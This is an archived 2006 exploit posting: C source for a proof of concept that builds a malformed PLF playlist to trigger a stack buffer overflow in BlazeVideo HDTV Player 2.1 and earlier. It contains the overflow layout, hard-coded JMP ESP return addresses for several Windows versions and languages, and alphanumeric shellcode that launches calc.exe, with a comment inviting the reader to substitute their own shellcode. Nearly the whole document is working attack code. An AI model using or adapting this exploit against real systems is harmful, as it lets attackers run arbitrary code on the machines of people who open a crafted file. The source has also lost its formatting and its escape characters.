blazevideo.txt
Posted on 06 December 2006
/* ======================================================================== 0-day BlazeVideo HDTV Player <= v2.1 Malformed PLF Buffer Overflow PoC ======================================================================== BlazeVideo HDTV v2.1 and prior fails to properly handle large file paths inside PLF files, the result is a stack based buffer overflow that allows an attacker to execute code in the context of the player. This exploit should also work for BlazeDVD v5.0, but i havent gotten around to testing it. C: + [BUFFER x 257 bytes] + [JMP] + [16 Garbage bytes] + [SHELLCODE in ESP] Happy Hunting and Happy Holidays to everyone <insert super awesome leet ascii art here> 30 days of Media Player Exploits by Greg Linares Discovered and Reported By: Greg Linares GLinares.code@gmail.com Reported Exploit Date: 12/1/2006 */ #include <stdio.h> #include <stdlib.h> #include <string.h> int main(int argc, char *argv[]) { FILE *Exploit; /* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */ unsigned char scode[] = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI" "YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM" "5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp" "LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip" "sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA"; /* replace it with your own shellcode :) */ int JMP, x; printf(" ====================================================================== "); printf("BlazeVideo HDTV Player <= v2.3 M3U Buffer Overflow Exploit "); printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com> "); printf("Usage: %s <output PLF file> <JMP> ", argv[0]); printf(" JMP Options "); printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc> "); printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc> "); printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc> "); printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256> "); printf("5 = French Windows XP Pro SP2 <JMP ESP 0x77d8519f> "); printf("6 = German/Italian/Dutch/Polish Windows XP SP2 <JMP ESP 0x77d873a0> "); printf("7 = Spainish Windows XP Pro SP2 <JMP ESP 0x77d9932f> "); printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 <JMP ESP 0x77e04c29> "); printf("9 = French/Italian/Chineese Windows 2000 Server SP4 <JMP ESP 0x77df4c29> "); printf("==================================================================== "); /* thanks metasploit and jerome for opcodes */ if (argc < 2) { printf("Invalid Number Of Arguments "); return 1; } Exploit = fopen(argv[1],"w"); if ( !Exploit ) { printf(" Couldn't Open File!"); return 1; } fputs("C:\", Exploit); for (x=0;x<257;x++) { fputs("A", Exploit); } if (atoi(argv[2]) <= 0) { JMP = 1; } else if (atoi(argv[2]) > 4) { JMP = 1; } else { JMP = atoi(argv[2]); } switch(JMP) { case 1: printf("Using English Windows XP SP2 JMP... "); fputs("xbcx41xdbx77", Exploit); break; case 2: printf("Using English Windows XP SP1 JMP... "); fputs("xfcx18xd7x77", Exploit); break; case 3: printf("Using English Windows 2003 SP0 & SP1 JMP... "); fputs("xdcx4axd7x77", Exploit); break; case 4: printf("Using English Windows 2000 SP 4 JMP... "); fputs("x56xc2xe3x77", Exploit); break; case 5: printf("Using French Windows XP SP 2 JMP... "); fputs("x9fx51xd8x77", Exploit); break; case 6: printf("Using German/Italian/Dutch/Polish Windows XP SP 2 JMP... "); fputs("xa0x73xd8x77", Exploit); break; case 7: printf("Using Spainish Windows XP SP 2 JMP... "); fputs("x2fx93xd9x77", Exploit); break; case 8: printf("Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP... "); fputs("x29x4cxe0x77", Exploit); break; case 9: printf("Using French/Italian/Chineese Windows 2000 Server SP 4 JMP... "); fputs("x29x4cxdfx77", Exploit); break; } for (x=0;x<16;x++) { fputs("x58", Exploit); } fputs(scode, Exploit); fputs(" ", Exploit); printf("Exploit Succeeded... Output File: %s ", argv[1]); printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com) "); printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code "); fclose(Exploit); return 0; }
